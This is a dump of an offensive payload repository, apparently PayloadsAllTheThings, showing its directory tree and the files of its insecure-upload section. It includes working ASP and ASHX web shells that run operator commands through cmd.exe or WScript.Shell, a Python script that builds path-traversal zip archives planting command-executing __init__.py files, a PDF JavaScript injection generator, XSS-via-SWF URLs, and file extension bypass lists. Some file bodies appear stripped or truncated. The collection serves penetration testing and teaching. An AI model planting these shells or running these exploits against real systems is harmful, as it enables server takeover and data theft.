├── .github
├── FUNDING.yml
└── banner.png
├── .gitignore
├── API Key Leaks
└── README.md
├── AWS Amazon Bucket S3
└── README.md
├── Account Takeover
└── README.md
├── BOOKS.md
├── CONTRIBUTING.md
├── CORS Misconfiguration
└── README.md
├── CRLF Injection
├── README.md
└── crlfinjection.txt
├── CSRF Injection
├── Images
│ └── CSRF-CheatSheet.png
└── README.md
├── CSV Injection
└── README.md
├── CVE Exploits
├── Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py
├── Apache Struts 2 CVE-2017-9805.py
├── Apache Struts 2 CVE-2018-11776.py
├── Citrix CVE-2019-19781.py
├── Docker API RCE.py
├── Drupalgeddon2 CVE-2018-7600.rb
├── Heartbleed CVE-2014-0160.py
├── JBoss CVE-2015-7501.py
├── Jenkins CVE-2015-8103.py
├── Jenkins CVE-2016-0792.py
├── Jenkins Groovy Console.py
├── README.md
├── Rails CVE-2019-5420.rb
├── Shellshock CVE-2014-6271.py
├── Telerik CVE-2017-9248.py
├── Telerik CVE-2019-18935.py
├── Tomcat CVE-2017-12617.py
├── WebLogic CVE-2016-3510.py
├── WebLogic CVE-2017-10271.py
├── WebLogic CVE-2018-2894.py
├── WebSphere CVE-2015-7450.py
└── vBulletin RCE 5.0.0 - 5.5.4.sh
├── Command Injection
├── Intruder
│ ├── command-execution-unix.txt
│ └── command_exec.txt
└── README.md
├── Directory Traversal
├── Intruder
│ ├── deep_traversal.txt
│ ├── directory_traversal.txt
│ ├── dotdotpwn.txt
│ └── traversals-8-deep-exotic-encoding.txt
└── README.md
├── File Inclusion
├── Intruders
│ ├── BSD-files.txt
│ ├── JHADDIX_LFI.txt
│ ├── LFI-FD-check.txt
│ ├── LFI-WindowsFileCheck.txt
│ ├── Linux-files.txt
│ ├── List_Of_File_To_Include.txt
│ ├── List_Of_File_To_Include_NullByteAdded.txt
│ ├── Mac-files.txt
│ ├── Traversal.txt
│ ├── Web-files.txt
│ ├── Windows-files.txt
│ ├── dot-slash-PathTraversal_and_LFI_pairing.txt
│ └── simple-check.txt
├── README.md
├── phpinfolfi.py
└── uploadlfi.py
├── GraphQL Injection
├── Images
│ └── htb-help.png
└── README.md
├── HTTP Parameter Pollution
└── README.md
├── Insecure Deserialization
├── Files
│ ├── PHP-Serialization-RCE-Exploit.php
│ └── Ruby_universal_gadget_generate_verify.rb
├── Java.md
├── PHP.md
├── Python.md
├── README.md
└── Ruby.md
├── Insecure Direct Object References
├── Images
│ └── idor.png
└── README.md
├── Insecure Management Interface
├── Intruder
│ └── springboot_actuator.txt
└── README.md
├── Insecure Source Code Management
└── README.md
├── JSON Web Token
└── README.md
├── Kubernetes
└── readme.md
├── LDAP Injection
├── Intruder
│ ├── LDAP_FUZZ.txt
│ └── LDAP_attributes.txt
└── README.md
├── LICENSE
├── LaTeX Injection
└── README.md
├── Methodology and Resources
├── Active Directory Attack.md
├── Bind Shell Cheatsheet.md
├── Cloud - AWS Pentest.md
├── Cloud - Azure Pentest.md
├── Cobalt Strike - Cheatsheet.md
├── Container - Docker Pentest.md
├── Escape Breakout.md
├── Linux - Persistence.md
├── Linux - Privilege Escalation.md
├── MSSQL Server - Cheatsheet.md
├── Metasploit - Cheatsheet.md
├── Methodology and enumeration.md
├── Miscellaneous - Tricks.md
├── Network Discovery.md
├── Network Pivoting Techniques.md
├── Office - Attacks.md
├── Reverse Shell Cheatsheet.md
├── Subdomains Enumeration.md
├── Windows - AMSI Bypass.md
├── Windows - Download and Execute.md
├── Windows - Mimikatz.md
├── Windows - Persistence.md
├── Windows - Post Exploitation Koadic.md
├── Windows - Privilege Escalation.md
└── Windows - Using credentials.md
├── NoSQL Injection
├── Intruder
│ └── NoSQL.txt
└── README.md
├── OAuth
└── README.md
├── Open Redirect
├── Intruder
│ ├── Open-Redirect-payloads.txt
│ ├── open_redirect_wordlist.txt
│ └── openredirects.txt
└── README.md
├── README.md
├── Race Condition
└── README.md
├── Request Smuggling
└── README.md
├── SAML Injection
├── Images
│ ├── SAML-xml-flaw.png
│ └── XSLT1.jpg
└── README.md
├── SQL Injection
├── Cassandra Injection.md
├── HQL Injection.md
├── Images
│ ├── PostgreSQL_cmd_exec.png
│ ├── Unicode_SQL_injection.png
│ └── wildcard_underscore.jpg
├── Intruder
│ ├── Auth_Bypass.txt
│ ├── Auth_Bypass2.txt
│ ├── FUZZDB_MSSQL-WHERE_Time.txt
│ ├── FUZZDB_MSSQL.txt
│ ├── FUZZDB_MSSQL_Enumeration.txt
│ ├── FUZZDB_MYSQL.txt
│ ├── FUZZDB_MySQL-WHERE_Time.txt
│ ├── FUZZDB_MySQL_ReadLocalFiles.txt
│ ├── FUZZDB_Oracle.txt
│ ├── FUZZDB_Postgres_Enumeration.txt
│ ├── Generic_ErrorBased.txt
│ ├── Generic_Fuzz.txt
│ ├── Generic_TimeBased.txt
│ ├── Generic_UnionSelect.txt
│ ├── SQL-Injection
│ ├── SQLi_Polyglots.txt
│ ├── payloads-sql-blind-MSSQL-INSERT
│ ├── payloads-sql-blind-MSSQL-WHERE
│ ├── payloads-sql-blind-MySQL-INSERT
│ ├── payloads-sql-blind-MySQL-ORDER_BY
│ └── payloads-sql-blind-MySQL-WHERE
├── MSSQL Injection.md
├── MySQL Injection.md
├── OracleSQL Injection.md
├── PostgreSQL Injection.md
├── README.md
└── SQLite Injection.md
├── Server Side Request Forgery
├── Files
│ ├── SSRF_expect.svg
│ ├── SSRF_url.svg
│ ├── ip.py
│ ├── ssrf_ffmpeg.avi
│ ├── ssrf_iframe.svg
│ ├── ssrf_svg_css_import.svg
│ ├── ssrf_svg_css_link.svg
│ ├── ssrf_svg_css_xmlstylesheet.svg
│ ├── ssrf_svg_image.svg
│ └── ssrf_svg_use.svg
├── Images
│ ├── Parser & Curl < 7.54.png
│ ├── SSRF_PDF.png
│ ├── SSRF_Parser.png
│ ├── SSRF_stream.png
│ ├── WeakParser.jpg
│ └── aws-cli.jpg
└── README.md
├── Server Side Template Injection
├── Images
│ └── serverside.png
├── Intruder
│ └── ssti.fuzz
└── README.md
├── TWITTER.md
├── Tabnabbing
└── README.md
├── Type Juggling
└── README.md
├── Upload Insecure Files
├── CVE Ffmpeg HLS
│ ├── README.md
│ ├── gen_avi_bypass.py
│ ├── gen_xbin_avi.py
│ ├── read_passwd.avi
│ ├── read_passwd_bypass.mp4
│ ├── read_shadow.avi
│ └── read_shadow_bypass.mp4
├── CVE ZIP Symbolic Link
│ ├── etc_passwd.zip
│ ├── generate.sh
│ └── passwd
├── Configuration Apache .htaccess
│ ├── .htaccess
│ ├── .htaccess_phpinfo
│ ├── .htaccess_shell
│ └── README.md
├── Configuration Busybox httpd.conf
│ ├── README.md
│ ├── httpd.conf
│ └── shellymcshellface.sh
├── Configuration IIS web.config
│ ├── web.config
│ └── web.web.config
├── Configuration Python __init__.py
│ ├── python-admin-__init__.py.zip
│ ├── python-conf-__init__.py.zip
│ ├── python-config-__init__.py.zip
│ ├── python-controllers-__init__.py.zip
│ ├── python-generate-init.py
│ ├── python-login-__init__.py.zip
│ ├── python-models-__init__.py.zip
│ ├── python-modules-__init__.py.zip
│ ├── python-scripts-__init__.py.zip
│ ├── python-settings-__init__.py.zip
│ ├── python-tests-__init__.py.zip
│ ├── python-urls-__init__.py.zip
│ ├── python-utils-__init__.py.zip
│ └── python-view-__init__.py.zip
├── EICAR
│ └── eicar.txt
├── Extension ASP
│ ├── shell.asa
│ ├── shell.ashx
│ ├── shell.asmx
│ ├── shell.asp
│ ├── shell.aspx
│ ├── shell.cer
│ └── shell.xamlx
├── Extension Flash
│ ├── README.md
│ ├── xss.swf
│ └── xssproject.swf
├── Extension HTML
│ └── xss.html
├── Extension PDF JS
│ ├── poc.js
│ ├── poc.py
│ └── result.pdf
├── Extension PHP
│ ├── extensions.lst
│ ├── phpinfo.jpg.php
│ ├── phpinfo.phar
│ ├── phpinfo.php
│ ├── phpinfo.php3
│ ├── phpinfo.php4
│ ├── phpinfo.php5
│ ├── phpinfo.php7
│ ├── phpinfo.phpt
│ ├── phpinfo.pht
│ ├── phpinfo.phtml
│ ├── shell.gif?shell.php
│ ├── shell.jpeg.php
│ ├── shell.jpg.php
│ ├── shell.jpg?shell.php
│ ├── shell.pgif
│ ├── shell.phar
│ ├── shell.php
│ ├── shell.php3
│ ├── shell.php4
│ ├── shell.php5
│ ├── shell.php7
│ ├── shell.phpt
│ ├── shell.pht
│ ├── shell.phtml
│ ├── shell.png.php
│ └── shell.png?shell.php
├── Picture Image Magik
│ ├── README.md
│ ├── convert_local_etc_passwd.svg
│ ├── convert_local_etc_passwd_html.svg
│ ├── ghostscript_rce_curl.jpg
│ ├── imagemagik_ghostscript_cmd_exec.pdf
│ ├── imagemagik_ghostscript_reverse_shell.jpg
│ ├── imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg
│ ├── imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg
│ ├── imagetragik1_payload_imageover_reverse_shell_devtcp.jpg
│ ├── imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png
│ ├── imagetragik1_payload_imageover_wget.gif
│ ├── imagetragik1_payload_url_bind_shell_nc.mvg
│ ├── imagetragik1_payload_url_curl.png
│ ├── imagetragik1_payload_url_portscan.jpg
│ ├── imagetragik1_payload_url_remote_connection.mvg
│ ├── imagetragik1_payload_url_reverse_shell_bash.mvg
│ ├── imagetragik1_payload_url_touch.jpg
│ ├── imagetragik1_payload_xml_reverse_shell_nctraditional.xml
│ ├── imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml
│ ├── imagetragik2_burpcollaborator_passwd.jpg
│ ├── imagetragik2_centos_id.jpg
│ ├── imagetragik2_ubuntu_id.jpg
│ ├── imagetragik2_ubuntu_shell.jpg
│ └── imagetragik2_ubuntu_shell2.jpg
├── Picture Metadata
│ ├── Build_image_to_LFI.py
│ ├── PHP_exif_phpinfo.jpg
│ ├── PHP_exif_system.gif
│ ├── PHP_exif_system.jpg
│ └── PHP_exif_system.png
├── Picture Resize
│ ├── GIF_exploit.gif
│ ├── JPG_exploit-55.jpg
│ ├── PNG_110x110_resize_bypass_use_LFI.png
│ ├── PNG_32x32_resize_bypass_use_LFI.png
│ ├── README.txt
│ ├── exploit_JPG.py
│ └── exploit_PNG_110x110.php
├── README.md
├── Server Side Include
│ ├── exec.shtml
│ ├── include.shtml
│ └── index.stm
└── Zip Slip
│ └── README.md
├── Web Cache Deception
├── Intruders
│ └── param_miner_lowercase_headers.txt
└── README.md
├── Web Sockets
├── Files
│ └── ws-harness.py
├── Images
│ ├── WebsocketHarness.jpg
│ ├── sqlmap.png
│ └── websocket-harness-start.png
└── README.md
├── XPATH Injection
└── README.md
├── XSLT Injection
└── README.md
├── XSS Injection
├── Files
│ ├── ">
24 | ")
25 | Set wShell1 = CreateObject("WScript.Shell")
26 | Set cmd1 = wShell1.Exec("whoami")
27 | output1 = cmd1.StdOut.Readall()
28 | set cmd1 = nothing: Set wShell1 = nothing
29 | Response.write(output1)
30 | Response.write("
31 |
32 | –>
33 |
34 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration IIS web.config/web.web.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
66 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-admin-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-admin-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-conf-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-conf-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-config-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-config-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-controllers-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-controllers-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-generate-init.py:
--------------------------------------------------------------------------------
1 | # Generating "evil" zip file
2 | # Based on the work of Ajin Abraham
3 | # Vuln website : https://github.com/ajinabraham/bad_python_extract
4 | # More info : https://ajinabraham.com/blog/exploiting-insecure-file-extraction-in-python-for-code-execution
5 |
6 | # Warning 1: need a restart from the server OR debug=True
7 | # Warning 2: you won't get the output of the command (blind rce)
8 | import zipfile
9 |
10 | directories = ["conf", "config", "settings", "utils", "urls", "view", "tests", "scripts", "controllers", "modules", "models", "admin", "login"]
11 | for d in directories:
12 | name = "python-"+d+"-__init__.py.zip"
13 | zipf = zipfile.ZipFile(name, 'w', zipfile.ZIP_DEFLATED)
14 | zipf.close()
15 | z_info = zipfile.ZipInfo(r"../"+d+"/__init__.py")
16 | z_file = zipfile.ZipFile(name, mode="w") # "/home/swissky/Bureau/"+
17 | z_file.writestr(z_info, "import os;print 'Shell';os.system('ls');")
18 | z_info.external_attr = 0o777 << 16
19 | z_file.close()
20 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-login-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-login-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-models-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-models-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-modules-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-modules-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-scripts-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-scripts-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-settings-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-settings-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-tests-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-tests-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-urls-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-urls-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-utils-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-utils-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-view-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Configuration Python __init__.py/python-view-__init__.py.zip
--------------------------------------------------------------------------------
/Upload Insecure Files/EICAR/eicar.txt:
--------------------------------------------------------------------------------
1 | X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
2 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension ASP/shell.asa:
--------------------------------------------------------------------------------
1 | <%
2 | ' *******************************************************************************
3 | ' ***
4 | ' *** Laudanum Project
5 | ' *** A Collection of Injectable Files used during a Penetration Test
6 | ' ***
7 | ' *** More information is available at:
8 | ' *** http://laudanum.secureideas.net
9 | ' *** laudanum@secureideas.net
10 | ' ***
11 | ' *** Project Leads:
12 | ' *** Kevin Johnson
14 | ' ***
15 | ' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
16 | ' ***
17 | ' ********************************************************************************
18 | ' ***
19 | ' *** Updated and fixed by Robin Wood
20 | ' *** Updated and fixed by Tim Medin "1.2.3.4" then
47 | response.Status="404 Page Not Found"
48 | response.Write(response.Status)
49 | response.End
50 | end if
51 |
52 | if Request.Form("submit") <> "" then
53 | Dim wshell, intReturn, strPResult
54 | cmd = Request.Form("cmd")
55 | Response.Write ("Running command: " & cmd & "
")
56 | set wshell = CreateObject("WScript.Shell")
57 | Set objCmd = wShell.Exec(cmd)
58 | strPResult = objCmd.StdOut.Readall()
59 |
60 | response.write "
" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "
"
61 |
62 | set wshell = nothing
63 | end if
64 |
65 | %>
66 |
67 | Laundanum ASP Shell
68 |
69 |
76 |
77 |
78 | Copyright © 2012, Kevin Johnson and the Laudanum team.
79 | Written by Tim Medin.
80 | Get the latest version at laudanum.secureideas.net.
81 |
82 |
83 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension ASP/shell.ashx:
--------------------------------------------------------------------------------
1 | <% @ webhandler language="C#" class="AverageHandler" %>
2 |
3 | using System;
4 | using System.Web;
5 | using System.Diagnostics;
6 | using System.IO;
7 |
8 | public class AverageHandler : IHttpHandler
9 | {
10 | /* .Net requires this to be implemented */
11 | public bool IsReusable
12 | {
13 | get { return true; }
14 | }
15 |
16 | /* main executing code */
17 | public void ProcessRequest(HttpContext ctx)
18 | {
19 | Uri url = new Uri(HttpContext.Current.Request.Url.Scheme + "://" + HttpContext.Current.Request.Url.Authority + HttpContext.Current.Request.RawUrl);
20 | string command = HttpUtility.ParseQueryString(url.Query).Get("cmd");
21 |
22 | ctx.Response.Write("");
23 | ctx.Response.Write("
");
24 | ctx.Response.Write("");
25 |
26 | /* command execution and output retrieval */
27 | ProcessStartInfo psi = new ProcessStartInfo();
28 | psi.FileName = "cmd.exe";
29 | psi.Arguments = "/c "+command;
30 | psi.RedirectStandardOutput = true;
31 | psi.UseShellExecute = false;
32 | Process p = Process.Start(psi);
33 | StreamReader stmrdr = p.StandardOutput;
34 | string s = stmrdr.ReadToEnd();
35 | stmrdr.Close();
36 |
37 | ctx.Response.Write(System.Web.HttpUtility.HtmlEncode(s));
38 | ctx.Response.Write("
");
39 | ctx.Response.Write("
");
40 | ctx.Response.Write("By @Hypn, for educational purposes only.");
41 | }
42 | }
43 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension ASP/shell.asp:
--------------------------------------------------------------------------------
1 | <%
2 | ' *******************************************************************************
3 | ' ***
4 | ' *** Laudanum Project
5 | ' *** A Collection of Injectable Files used during a Penetration Test
6 | ' ***
7 | ' *** More information is available at:
8 | ' *** http://laudanum.secureideas.net
9 | ' *** laudanum@secureideas.net
10 | ' ***
11 | ' *** Project Leads:
12 | ' *** Kevin Johnson
14 | ' ***
15 | ' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
16 | ' ***
17 | ' ********************************************************************************
18 | ' ***
19 | ' *** Updated and fixed by Robin Wood
20 | ' *** Updated and fixed by Tim Medin "1.2.3.4" then
47 | response.Status="404 Page Not Found"
48 | response.Write(response.Status)
49 | response.End
50 | end if
51 |
52 | if Request.Form("submit") <> "" then
53 | Dim wshell, intReturn, strPResult
54 | cmd = Request.Form("cmd")
55 | Response.Write ("Running command: " & cmd & "
")
56 | set wshell = CreateObject("WScript.Shell")
57 | Set objCmd = wShell.Exec(cmd)
58 | strPResult = objCmd.StdOut.Readall()
59 |
60 | response.write "
" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "
"
61 |
62 | set wshell = nothing
63 | end if
64 |
65 | %>
66 |
67 | Laundanum ASP Shell
68 |
69 |
76 |
77 |
78 | Copyright © 2012, Kevin Johnson and the Laudanum team.
79 | Written by Tim Medin.
80 | Get the latest version at laudanum.secureideas.net.
81 |
82 |
83 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension ASP/shell.xamlx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 | [System.Diagnostics.Process.Start("cmd.exe", "/c calc").toString()]
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension Flash/README.md:
--------------------------------------------------------------------------------
1 | ### XSS via SWF
2 |
3 | As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs.
4 | This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.
5 |
6 | ```powershell
7 | Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
8 |
9 | IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
10 |
11 | IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
12 | ```
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension Flash/xss.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Extension Flash/xss.swf
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension Flash/xssproject.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Extension Flash/xssproject.swf
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension HTML/xss.html:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PDF JS/poc.js:
--------------------------------------------------------------------------------
1 | app.alert("XSS")
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PDF JS/poc.py:
--------------------------------------------------------------------------------
1 | # FROM https://github.com/osnr/horrifying-pdf-experiments
2 | import sys
3 |
4 | from pdfrw import PdfWriter
5 | from pdfrw.objects.pdfname import PdfName
6 | from pdfrw.objects.pdfstring import PdfString
7 | from pdfrw.objects.pdfdict import PdfDict
8 | from pdfrw.objects.pdfarray import PdfArray
9 |
10 | def make_js_action(js):
11 | action = PdfDict()
12 | action.S = PdfName.JavaScript
13 | action.JS = js
14 | return action
15 |
16 | def make_field(name, x, y, width, height, r, g, b, value=""):
17 | annot = PdfDict()
18 | annot.Type = PdfName.Annot
19 | annot.Subtype = PdfName.Widget
20 | annot.FT = PdfName.Tx
21 | annot.Ff = 2
22 | annot.Rect = PdfArray([x, y, x + width, y + height])
23 | annot.MaxLen = 160
24 | annot.T = PdfString.encode(name)
25 | annot.V = PdfString.encode(value)
26 |
27 | # Default appearance stream: can be arbitrary PDF XObject or
28 | # something. Very general.
29 | annot.AP = PdfDict()
30 |
31 | ap = annot.AP.N = PdfDict()
32 | ap.Type = PdfName.XObject
33 | ap.Subtype = PdfName.Form
34 | ap.FormType = 1
35 | ap.BBox = PdfArray([0, 0, width, height])
36 | ap.Matrix = PdfArray([1.0, 0.0, 0.0, 1.0, 0.0, 0.0])
37 | ap.stream = """
38 | %f %f %f rg
39 | 0.0 0.0 %f %f re f
40 | """ % (r, g, b, width, height)
41 |
42 | # It took me a while to figure this out. See PDF spec:
43 | # https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf_reference_1-7.pdf#page=641
44 |
45 | # Basically, the appearance stream we just specified doesn't
46 | # follow the field rect if it gets changed in JS (at least not in
47 | # Chrome).
48 |
49 | # But this simple MK field here, with border/color
50 | # characteristics, _does_ follow those movements and resizes, so
51 | # we can get moving colored rectangles this way.
52 | annot.MK = PdfDict()
53 | annot.MK.BG = PdfArray([r, g, b])
54 |
55 | return annot
56 |
57 | def make_page(fields, script):
58 | page = PdfDict()
59 | page.Type = PdfName.Page
60 |
61 | page.Resources = PdfDict()
62 | page.Resources.Font = PdfDict()
63 | page.Resources.Font.F1 = PdfDict()
64 | page.Resources.Font.F1.Type = PdfName.Font
65 | page.Resources.Font.F1.Subtype = PdfName.Type1
66 | page.Resources.Font.F1.BaseFont = PdfName.Helvetica
67 |
68 | page.MediaBox = PdfArray([0, 0, 612, 792])
69 |
70 | page.Contents = PdfDict()
71 | page.Contents.stream = """
72 | BT
73 | /F1 24 Tf
74 | ET
75 | """
76 |
77 | annots = fields
78 |
79 | page.AA = PdfDict()
80 | # You probably should just wrap each JS action with a try/catch,
81 | # because Chrome does no error reporting or even logging otherwise;
82 | # you just get a silent failure.
83 | page.AA.O = make_js_action("""
84 | try {
85 | %s
86 | } catch (e) {
87 | app.alert(e.message);
88 | }
89 | """ % (script))
90 |
91 | page.Annots = PdfArray(annots)
92 | return page
93 |
94 | if len(sys.argv) > 1:
95 | js_file = open(sys.argv[1], 'r')
96 |
97 | fields = []
98 | for line in js_file:
99 | if not line.startswith('/// '): break
100 | pieces = line.split()
101 | params = [pieces[1]] + [float(token) for token in pieces[2:]]
102 | fields.append(make_field(*params))
103 |
104 | js_file.seek(0)
105 |
106 | out = PdfWriter()
107 | out.addpage(make_page(fields, js_file.read()))
108 | out.write('result.pdf')
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PDF JS/result.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Extension PDF JS/result.pdf
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/extensions.lst:
--------------------------------------------------------------------------------
1 | .jpeg.php
2 | .jpg.php
3 | .png.php
4 | .php
5 | .php3
6 | .php4
7 | .php5
8 | .php7
9 | .pht
10 | .phar
11 | .phpt
12 | .pgif
13 | .phtml
14 | .phtm
15 | .php%00.gif
16 | .php\x00.gif
17 | .php%00.png
18 | .php\x00.png
19 | .php%00.jpg
20 | .php\x00.jpg
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.jpg.php:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.phar:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.php:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.php3:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.php4:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.php5:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.php7:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.phpt:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.pht:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.phtml:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.gif?shell.php:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.jpeg.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.jpg.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.jpg?shell.php:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.pgif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Extension PHP/shell.pgif
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.phar:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.php:
